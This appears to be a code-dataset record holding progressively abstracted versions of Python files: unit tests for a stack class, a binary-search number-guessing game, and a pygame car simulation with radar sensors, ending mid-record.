"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n\n def test_simple(self):\n stack = Stack(5)\n stack.push(0)\n self.assertFalse(stack.is_empty())\n self.assertFalse(stack.is_full())\n self.assertEqual(stack.size(), 1)\n\n def test_simple_2(self):\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n\n def test_simple_3(self):\n stack = Stack(1)\n stack.push(4)\n self.assertTrue(stack.is_full)\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n\n def test_simple_7(self):\n stack = Stack(None)\n with self.assertRaises(IndexError):\n stack.push('hello')\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n\n def test_simple(self):\n stack = Stack(5)\n stack.push(0)\n self.assertFalse(stack.is_empty())\n self.assertFalse(stack.is_full())\n self.assertEqual(stack.size(), 1)\n\n def test_simple_2(self):\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n\n def test_simple_3(self):\n stack = Stack(1)\n stack.push(4)\n self.assertTrue(stack.is_full)\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n\n def test_simple_7(self):\n stack = Stack(None)\n with self.assertRaises(IndexError):\n stack.push('hello')\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n\n def test_simple(self):\n stack = Stack(5)\n stack.push(0)\n self.assertFalse(stack.is_empty())\n self.assertFalse(stack.is_full())\n self.assertEqual(stack.size(), 1)\n\n def test_simple_2(self):\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n\n def test_simple_7(self):\n stack = Stack(None)\n with self.assertRaises(IndexError):\n stack.push('hello')\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n\n def test_simple_2(self):\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n\n def test_simple_7(self):\n stack = Stack(None)\n with self.assertRaises(IndexError):\n stack.push('hello')\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n\n def test_simple_2(self):\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n <function token>\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n <function token>\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n <function token>\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n <function token>\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n <function token>\n <function token>\n <function token>\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<code token>\n",
"<import token>\n<class token>\n<code token>\n"
] | false |
99,833 | 4baf3f570cc5c23ca0ab06c1454504202673716d | #!/usr/bin/env python
# coding: utf-8
# In[2]:
def game_core(number): #самый очевидный и простой способ - бинарный поиск
count = 0
predict = 50 #берем в качестве первого предположения среднее значение из интервала от 0 до 100
max1 = 100 #верхняя граница
min1 = 0 #нижняя граница
while number != predict:
count+=1
if number > predict:
min1 = predict #так как загаданное число больше, то предположение становится новой нижней границей поиска
predict = (min1+max1) // 2 #снова берём среднее значение
elif number < predict:
max1 = predict #так как загаданное число меньше, то предположение становится новой верхней границей поиска
predict = (min1+max1) // 2 #снова берём среднее значение
return(count)
# In[ ]:
import numpy as np
def score_game(game_core_v1): #функция симулирующая игру угадай число
'''Запускаем игру 1000 раз, чтоб узнать как быстро игра угадывает число'''
count_ls = []
np.random.seed(1) # фиксируем RANDOM SEED, чтобы эксперимент был воспроизводим!
random_array = np.random.randint(1, 101, size=(250))
for number in random_array:
count_ls.append(game_core_v1(number))
score = int(np.mean(count_ls))
print(f"Ваш алгоритм угадывает число в среднем за {score} попыток")
return(score)
score_game (game_core)
| [
"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\ndef game_core(number): #самый очевидный и простой способ - бинарный поиск\n count = 0\n predict = 50 #берем в качестве первого предположения среднее значение из интервала от 0 до 100\n max1 = 100 #верхняя граница\n min1 = 0 #нижняя граница\n while number != predict:\n count+=1\n if number > predict:\n min1 = predict #так как загаданное число больше, то предположение становится новой нижней границей поиска\n predict = (min1+max1) // 2 #снова берём среднее значение\n elif number < predict:\n max1 = predict #так как загаданное число меньше, то предположение становится новой верхней границей поиска\n predict = (min1+max1) // 2 #снова берём среднее значение\n return(count)\n\n\n# In[ ]:\n\n\nimport numpy as np\ndef score_game(game_core_v1): #функция симулирующая игру угадай число\n '''Запускаем игру 1000 раз, чтоб узнать как быстро игра угадывает число'''\n count_ls = []\n np.random.seed(1) # фиксируем RANDOM SEED, чтобы эксперимент был воспроизводим!\n random_array = np.random.randint(1, 101, size=(250))\n for number in random_array:\n count_ls.append(game_core_v1(number))\n score = int(np.mean(count_ls))\n print(f\"Ваш алгоритм угадывает число в среднем за {score} попыток\")\n return(score)\nscore_game (game_core)\n\n",
"def game_core(number):\n count = 0\n predict = 50\n max1 = 100\n min1 = 0\n while number != predict:\n count += 1\n if number > predict:\n min1 = predict\n predict = (min1 + max1) // 2\n elif number < predict:\n max1 = predict\n predict = (min1 + max1) // 2\n return count\n\n\nimport numpy as np\n\n\ndef score_game(game_core_v1):\n \"\"\"Запускаем игру 1000 раз, чтоб узнать как быстро игра угадывает число\"\"\"\n count_ls = []\n np.random.seed(1)\n random_array = np.random.randint(1, 101, size=250)\n for number in random_array:\n count_ls.append(game_core_v1(number))\n score = int(np.mean(count_ls))\n print(f'Ваш алгоритм угадывает число в среднем за {score} попыток')\n return score\n\n\nscore_game(game_core)\n",
"def game_core(number):\n count = 0\n predict = 50\n max1 = 100\n min1 = 0\n while number != predict:\n count += 1\n if number > predict:\n min1 = predict\n predict = (min1 + max1) // 2\n elif number < predict:\n max1 = predict\n predict = (min1 + max1) // 2\n return count\n\n\n<import token>\n\n\ndef score_game(game_core_v1):\n \"\"\"Запускаем игру 1000 раз, чтоб узнать как быстро игра угадывает число\"\"\"\n count_ls = []\n np.random.seed(1)\n random_array = np.random.randint(1, 101, size=250)\n for number in random_array:\n count_ls.append(game_core_v1(number))\n score = int(np.mean(count_ls))\n print(f'Ваш алгоритм угадывает число в среднем за {score} попыток')\n return score\n\n\nscore_game(game_core)\n",
"def game_core(number):\n count = 0\n predict = 50\n max1 = 100\n min1 = 0\n while number != predict:\n count += 1\n if number > predict:\n min1 = predict\n predict = (min1 + max1) // 2\n elif number < predict:\n max1 = predict\n predict = (min1 + max1) // 2\n return count\n\n\n<import token>\n\n\ndef score_game(game_core_v1):\n \"\"\"Запускаем игру 1000 раз, чтоб узнать как быстро игра угадывает число\"\"\"\n count_ls = []\n np.random.seed(1)\n random_array = np.random.randint(1, 101, size=250)\n for number in random_array:\n count_ls.append(game_core_v1(number))\n score = int(np.mean(count_ls))\n print(f'Ваш алгоритм угадывает число в среднем за {score} попыток')\n return score\n\n\n<code token>\n",
"def game_core(number):\n count = 0\n predict = 50\n max1 = 100\n min1 = 0\n while number != predict:\n count += 1\n if number > predict:\n min1 = predict\n predict = (min1 + max1) // 2\n elif number < predict:\n max1 = predict\n predict = (min1 + max1) // 2\n return count\n\n\n<import token>\n<function token>\n<code token>\n",
"<function token>\n<import token>\n<function token>\n<code token>\n"
] | false |
99,834 | 757b52dbee049c9c433ffc4cbaf5323c10a031cf | import math
import pygame as pg
from pygameUtils import rotate, calc_sides
from dotenv import load_dotenv
import os
CAR_HEIGHT = 100
CAR_WIDTH = 100
RADAR_COLOR = (0, 0, 255)
WHITE_COLOR = (255, 255, 255, 255)
load_dotenv()
class Car(object):
"""Car class for pygame simulation"""
def __init__(self, game_map):
self.game_map = game_map
self.surface = pg.image.load('red_car.png')
self.surface = pg.transform.scale(
self.surface, (CAR_WIDTH, CAR_HEIGHT)
)
self.rotate_surface = self.surface
self.x_pos = 600
self.y_pos = 655
self.angle = 0
self.speed = 7
self.distance = 0
self.collided = False
self.collision_points = []
self.radars = []
self.center = [
self.x_pos + 50, self.y_pos + 50
]
def draw(self, screen):
"""Renders the car intro the screen"""
screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])
self.draw_radar(screen)
def update(self):
"""Updates the car itself"""
#self.x_pos += dif_x
#self.y_pos += dif_y
self.distance += self.speed
#self.angle += dif_angle
self.x_pos += math.cos(math.radians(360-self.angle)) * self.speed
self.y_pos += math.sin(math.radians(360-self.angle)) * self.speed
self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]
self.rotate_surface = rotate(self.surface, self.angle)
# Clear the radars that have been used
self.update_collision_points()
self.check_collision()
self.radars.clear()
sensoresList = []
if (int(os.getenv("NUM_SENSORES")) == 3):
sensoresList = list(range(-90, 120, 90))
elif (int(os.getenv("NUM_SENSORES")) == 4):
sensoresList = list(range(-90, 120, 60))
elif (int(os.getenv("NUM_SENSORES")) == 5):
sensoresList = list(range(-90, 120, 45))
elif (int(os.getenv("NUM_SENSORES")) == 9):
sensoresList = list(range(-90, 120, 25))
elif (int(os.getenv("NUM_SENSORES")) == 11):
sensoresList = list(range(-90, 120, 20))
# Draw the radars in the given angles
for degree in sensoresList:
self.update_radar(degree)
def update_radar(self, degree):
"""Updates the car radars and appends them to its list"""
length = 0
# Calculate the x center of the car, considering its rotation
x_len = int(
self.center[0] + math.cos(
math.radians(360 - (self.angle + degree))
) * length
) # Calculate the y center of the car, considering its rotation
y_len = int(
self.center[1] + math.sin(
math.radians(360 - (self.angle + degree))
) * length
)
# Check if the pixel we want is not out of range
try:
pixel = self.game_map.get_at((x_len, y_len))
except IndexError:
pixel = WHITE_COLOR
# We have to check if one of the sides is out of the track
while pixel != WHITE_COLOR and length < 300:
try:
# Try to get the furthest pixel in the game
pixel = self.game_map.get_at((x_len, y_len))
except IndexError:
# If it fails, just set it as a white color
pixel = WHITE_COLOR
else:
# Change the length and update x and y values
length = length + 1
# Update x values
x_len = int(
self.center[0] + math.cos(
math.radians(360 - (self.angle + degree))
) * length
)
# Update y values
y_len = int(
self.center[1] + math.sin(
math.radians(360 - (self.angle + degree))
) * length
)
# Get the vertical and horizontal side of the car
horizontal = math.pow(x_len - self.center[0], 2)
vertical = math.pow(y_len - self.center[1], 2)
# If we get the hypotenuse of the triangle, we are also getting
# the distance of the radar
distance = int(math.sqrt(horizontal + vertical))
self.radars.append([(x_len, y_len), distance])
def draw_radar(self, screen):
"""Draws the radars on the screen"""
self.get_data()
for radar in self.radars:
position, _ = radar
pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)
pg.draw.circle(screen, RADAR_COLOR, position, 2)
def update_collision_points(self):
"""Calls for calc_sides method in order to get the sides of the car"""
self.collision_points = calc_sides(self.center, self.angle)
def check_collision(self):
"""Checks if one of the collision points of the car is a white pixel
which if it is, means it got out of the track"""
self.collided = False
for point in self.collision_points:
try:
if self.game_map.get_at((
int(point[0]), int(point[1])
)) == WHITE_COLOR:
self.collided = True
break
except:
self.collided = True
def get_collided(self):
"""Returns if the car has collided or not"""
return self.collided
def get_reward(self):
return self.distance/50.0
def get_data(self):
inputLayer = []
for i in range(int(os.getenv("NUM_SENSORES"))):
inputLayer.append(0)
for i, radar in enumerate(self.radars):
inputLayer[i] = int(radar[1]/30)
return inputLayer
| [
"import math\nimport pygame as pg\nfrom pygameUtils import rotate, calc_sides\nfrom dotenv import load_dotenv\nimport os\n\nCAR_HEIGHT = 100\nCAR_WIDTH = 100\nRADAR_COLOR = (0, 0, 255)\nWHITE_COLOR = (255, 255, 255, 255)\nload_dotenv()\n\n\nclass Car(object):\n \"\"\"Car class for pygame simulation\"\"\"\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(\n self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [\n self.x_pos + 50, self.y_pos + 50\n ]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n #self.x_pos += dif_x\n #self.y_pos += dif_y\n self.distance += self.speed\n #self.angle += dif_angle\n self.x_pos += math.cos(math.radians(360-self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360-self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n\n # Clear the radars that have been used\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n\n sensoresList = []\n if (int(os.getenv(\"NUM_SENSORES\")) == 3):\n sensoresList = list(range(-90, 120, 90))\n elif (int(os.getenv(\"NUM_SENSORES\")) == 4):\n sensoresList = list(range(-90, 120, 60))\n elif (int(os.getenv(\"NUM_SENSORES\")) == 5):\n sensoresList = list(range(-90, 120, 45))\n elif (int(os.getenv(\"NUM_SENSORES\")) == 9):\n sensoresList = list(range(-90, 120, 25))\n elif (int(os.getenv(\"NUM_SENSORES\")) == 11):\n sensoresList = list(range(-90, 120, 20))\n\n # Draw the radars in the given angles\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n\n # Calculate the x center of the car, considering its rotation\n x_len = int(\n self.center[0] + math.cos(\n math.radians(360 - (self.angle + degree))\n ) * length\n ) # Calculate the y center of the car, considering its rotation\n y_len = int(\n self.center[1] + math.sin(\n math.radians(360 - (self.angle + degree))\n ) * length\n )\n\n # Check if the pixel we want is not out of range\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n\n # We have to check if one of the sides is out of the track\n while pixel != WHITE_COLOR and length < 300:\n\n try:\n # Try to get the furthest pixel in the game\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n # If it fails, just set it as a white color\n pixel = WHITE_COLOR\n else:\n # Change the length and update x and y values\n length = length + 1\n\n # Update x values\n x_len = int(\n self.center[0] + math.cos(\n math.radians(360 - (self.angle + degree))\n ) * length\n )\n\n # Update y values\n y_len = int(\n self.center[1] + math.sin(\n math.radians(360 - (self.angle + degree))\n ) * length\n )\n\n # Get the vertical and horizontal side of the car\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n\n # If we get the hypotenuse of the triangle, we are also getting\n # the distance of the radar\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n\n def draw_radar(self, screen):\n \"\"\"Draws the radars on the screen\"\"\"\n self.get_data()\n for radar in self.radars:\n position, _ = radar\n pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)\n pg.draw.circle(screen, RADAR_COLOR, position, 2)\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n\n for point in self.collision_points:\n\n try:\n if self.game_map.get_at((\n int(point[0]), int(point[1])\n )) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance/50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv(\"NUM_SENSORES\"))):\n inputLayer.append(0)\n\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1]/30)\n return inputLayer\n",
"import math\nimport pygame as pg\nfrom pygameUtils import rotate, calc_sides\nfrom dotenv import load_dotenv\nimport os\nCAR_HEIGHT = 100\nCAR_WIDTH = 100\nRADAR_COLOR = 0, 0, 255\nWHITE_COLOR = 255, 255, 255, 255\nload_dotenv()\n\n\nclass Car(object):\n \"\"\"Car class for pygame simulation\"\"\"\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n self.distance += self.speed\n self.x_pos += math.cos(math.radians(360 - self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360 - self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n sensoresList = []\n if int(os.getenv('NUM_SENSORES')) == 3:\n sensoresList = list(range(-90, 120, 90))\n elif int(os.getenv('NUM_SENSORES')) == 4:\n sensoresList = list(range(-90, 120, 60))\n elif int(os.getenv('NUM_SENSORES')) == 5:\n sensoresList = list(range(-90, 120, 45))\n elif int(os.getenv('NUM_SENSORES')) == 9:\n sensoresList = list(range(-90, 120, 25))\n elif int(os.getenv('NUM_SENSORES')) == 11:\n sensoresList = list(range(-90, 120, 20))\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n\n def draw_radar(self, screen):\n \"\"\"Draws the radars on the screen\"\"\"\n self.get_data()\n for radar in self.radars:\n position, _ = radar\n pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)\n pg.draw.circle(screen, RADAR_COLOR, position, 2)\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\nCAR_HEIGHT = 100\nCAR_WIDTH = 100\nRADAR_COLOR = 0, 0, 255\nWHITE_COLOR = 255, 255, 255, 255\nload_dotenv()\n\n\nclass Car(object):\n \"\"\"Car class for pygame simulation\"\"\"\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n self.distance += self.speed\n self.x_pos += math.cos(math.radians(360 - self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360 - self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n sensoresList = []\n if int(os.getenv('NUM_SENSORES')) == 3:\n sensoresList = list(range(-90, 120, 90))\n elif int(os.getenv('NUM_SENSORES')) == 4:\n sensoresList = list(range(-90, 120, 60))\n elif int(os.getenv('NUM_SENSORES')) == 5:\n sensoresList = list(range(-90, 120, 45))\n elif int(os.getenv('NUM_SENSORES')) == 9:\n sensoresList = list(range(-90, 120, 25))\n elif int(os.getenv('NUM_SENSORES')) == 11:\n sensoresList = list(range(-90, 120, 20))\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n\n def draw_radar(self, screen):\n \"\"\"Draws the radars on the screen\"\"\"\n self.get_data()\n for radar in self.radars:\n position, _ = radar\n pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)\n pg.draw.circle(screen, RADAR_COLOR, position, 2)\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\nload_dotenv()\n\n\nclass Car(object):\n \"\"\"Car class for pygame simulation\"\"\"\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n self.distance += self.speed\n self.x_pos += math.cos(math.radians(360 - self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360 - self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n sensoresList = []\n if int(os.getenv('NUM_SENSORES')) == 3:\n sensoresList = list(range(-90, 120, 90))\n elif int(os.getenv('NUM_SENSORES')) == 4:\n sensoresList = list(range(-90, 120, 60))\n elif int(os.getenv('NUM_SENSORES')) == 5:\n sensoresList = list(range(-90, 120, 45))\n elif int(os.getenv('NUM_SENSORES')) == 9:\n sensoresList = list(range(-90, 120, 25))\n elif int(os.getenv('NUM_SENSORES')) == 11:\n sensoresList = list(range(-90, 120, 20))\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its 